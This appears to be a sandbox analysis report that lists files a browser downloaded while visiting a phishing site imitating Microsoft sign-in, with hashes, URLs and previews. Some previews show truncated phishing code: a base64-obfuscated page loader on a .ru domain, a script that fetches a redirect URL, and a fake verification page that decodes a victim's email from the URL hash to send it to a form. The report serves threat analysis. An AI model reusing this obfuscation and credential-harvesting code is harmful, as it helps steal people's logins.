                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:1
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text, with very long lines (47520)
                                            Category:downloaded
                                            Size (bytes):47521
                                            Entropy (8bit):5.3981340461317835
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:7C92EC9D1395055CE0405A32607C7291
                                            SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                            SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                            SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js
                                            Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                            Category:downloaded
                                            Size (bytes):3452
                                            Entropy (8bit):5.117912766689607
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:CB06E9A552B197D5C0EA600B431A3407
                                            SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                            SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                            SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://login.live.com/Me.htm?v=3
                                            Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57678
                                            Category:downloaded
                                            Size (bytes):16378
                                            Entropy (8bit):7.986541062710992
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:FC8A7FB6FB26ADEB81D76A33DA13B815
                                            SHA1:ADEF9857A4FC698836B613252AE8B1FC0EC199DE
                                            SHA-256:A3D6351A6E93FC23C2A3ABFFCBDC847D42B8781DBFFBCCEEF4FEF72E0D5D4A14
                                            SHA-512:DE70865494E5D2A32353614CC7D8305CAA83E1605F6BF03C58DD6E19D92FDE8B33B3E26ED3A65D739DEA20984130D39B6E43641B04918CC906DEC17E51B0D582
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_v20ia-gahguvu2fgvxamhg2.js
                                            Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):72
                                            Entropy (8bit):4.241202481433726
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:HTML document, ASCII text, with very long lines (7569), with CRLF line terminators
                                            Category:downloaded
                                            Size (bytes):19988
                                            Entropy (8bit):5.876223984516001
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:FE60EA7C32FCC9C46817F4AD3D49CC71
                                            SHA1:73F93DCA50AD7A58979C28D04FD44F99A434D435
                                            SHA-256:14F4F24CD394EBF3516C8EB609284C2E9FBA56A70607A986D98ABB257778C751
                                            SHA-512:DA24D8ADD55FB755C4170E58ADCC57B12AABBFEF24FC3BDE0BA9A1FC981BB0D23D80B36003BE7853BD080BDECF2B784FAC0E9964D7DBA7C4E34344E30FE93E35
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://topimo.trilidarn.ru/kyVPsDa/
                                            Preview:<script>../* Stop chasing the money and start chasing the passion. */..if(atob("aHR0cHM6Ly94VC50cmlsaWRhcm4ucnUva3lWUHNEYS8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCi
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:downloaded
                                            Size (bytes):96
                                            Entropy (8bit):5.218997042938778
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:9872BE83FA60DA999B65A3BD481731D3
                                            SHA1:B59A8688C6A0D5311C6410A0D91537084E148F2D
                                            SHA-256:5DEE42A8D755847C0813D4E5F033F51197B20DD3C6C2EE4FBE31FD27B2F593D3
                                            SHA-512:53E947C87386ECF19E3B36E3F292A9757911F0F8B02FE36DDFC0DD74A3C784D97B15066AB4895EA694F66792A8C7CF525F59A03868FF5D5F0C3B5203D34C5F7D
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                            Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O348JyJcXRABGP////8P
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):2009
                                            Entropy (8bit):3.780989940549515
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:6DAA3DA7A00F06D4351BFFDF661D65BF
                                            SHA1:E7BCA33A46438D9833FF96A614A990CA90BB3DCE
                                            SHA-256:35FF658910C0DA186EF710711AA1C774756BC6E2855D7783BB2FF0A36EDF0308
                                            SHA-512:BCB3875FF729A94DD7DA3C0D90760FE59FDCBF9657938E599DF552F10313BB61104535275C4266BBE8A1E8D9AB79DB0E3D118856A2FAD62A92617F950EF7E626
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:..const urlx = 'https://natrium100gram.site/public/api/page/redirect';..... // Function to perform GET request. async function fetchData() {. try {. . const response = await fetch(urlx);.. if (!response.ok) {. throw new Error('Network response was not ok');. }.. . const data = await response.json();. . const message = data.message;.. return message ;.. . let messageUrl = message;.. } catch (error) {. // Handle errors. console.error('There was a problem with the fetch operation:', error);. }. }... async function run() {. console.log("readya!");. let key = "";. let jk = "";. const originalConsoleLog = console.log;. console.log = function(message) {. window.open(message,"_se
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:PNG image data, 36 x 59, 8-bit/color RGB, non-interlaced
                                            Category:dropped
                                            Size (bytes):61
                                            Entropy (8bit):4.035372245524405
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:0EB9EF04E9EEB5B8254A15683A7B4C2B
                                            SHA1:2B39575B55779A69E71884E4D94BABA3523815A3
                                            SHA-256:EEC913CB1893832B680E4C74E0515712D0C1C8228F546AE4E25CE25CBE11982C
                                            SHA-512:B61A5E8159772B177CD4698D4592E2B7A3E37D67620018B5F436653DD9DC65A0DB25D9F771045D180EB9BD9C95D7AB2F59C773BC0A287CDA69F58207A95CC542
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:.PNG........IHDR...$...;...........IDAT.....$.....IEND.B`.
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:HTML document, ASCII text, with very long lines (709)
                                            Category:downloaded
                                            Size (bytes):3530
                                            Entropy (8bit):5.183989097603964
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:D22721B5C0396AFAB367F24463AC6542
                                            SHA1:C28D2F7D3AF5D7BBBDF9FCFBC6D0C9D21D86064D
                                            SHA-256:71F4179F271340B7801D10F4DDFA5266657DA63628D2689E89E389C8CA39283D
                                            SHA-512:AE0E9DE1EB360839409095EECD09D27C9285116CCEC4B4ACFEFD412A67F0BCAC97626B0A82A9B1DB9F5B6D70535D4B3992157CFCD9985C6FF87F8906DAC8CDFB
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://pending-revew.pages.dev/
                                            Preview:..<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8" />. <title>Just a moment...</title>. <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>.. DEWE -->.. <script>... function javascriptCallback() {. var hashValue = window.location.hash.substr(1);. var hash2 = hashValue.split("#")[1];. // console.log(hash2[1]);.. const urlParams = new URLSearchParams(hashValue);. const name = urlParams.get('service');.. .. // Decode the Base64-encoded value. var decodedValue = atob(name);. console.log(decodedValue);. var parts = decodedValue.split("&");. . . var mails = parts[0];. var mails2 = atob(mails);. console.log(mails2);. . var key = parts[1];. var display = parts[2];.. var form = new FormData();. // form.append("subs", `${mails}
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                            Category:dropped
                                            Size (bytes):621
                                            Entropy (8bit):7.673946009263606
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:4761405717E938D7E7400BB15715DB1E
                                            SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                            SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                            SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                            Category:downloaded
                                            Size (bytes):122725
                                            Entropy (8bit):7.997347629519925
                                            Encrypted:true
                                            SSDEEP:
                                            MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                            SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                            SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                            SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_n7VKwtWYm2mBLcIKAZfQlw2.js
                                            Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                            Category:downloaded
                                            Size (bytes):673
                                            Entropy (8bit):7.6596900876595075
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:0E176276362B94279A4492511BFCBD98
                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:GIF image data, version 89a, 352 x 3
                                            Category:dropped
                                            Size (bytes):2672
                                            Entropy (8bit):6.640973516071413
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:166DE53471265253AB3A456DEFE6DA23
                                            SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                            SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                            SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                            Category:downloaded
                                            Size (bytes):20410
                                            Entropy (8bit):7.980582012022051
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                            SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                            SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                            SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                            Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                            Category:dropped
                                            Size (bytes):5525
                                            Entropy (8bit):7.961202222662501
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                            SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                            SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                            SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                            Category:downloaded
                                            Size (bytes):35170
                                            Entropy (8bit):7.993096534744333
                                            Encrypted:true
                                            SSDEEP:
                                            MD5:171A4DD9400708B88724B57D62B24A6A
                                            SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                            SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                            SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                            Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:GIF image data, version 89a, 352 x 3
                                            Category:downloaded
                                            Size (bytes):3620
                                            Entropy (8bit):6.867828878374734
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:B540A8E518037192E32C4FE58BF2DBAB
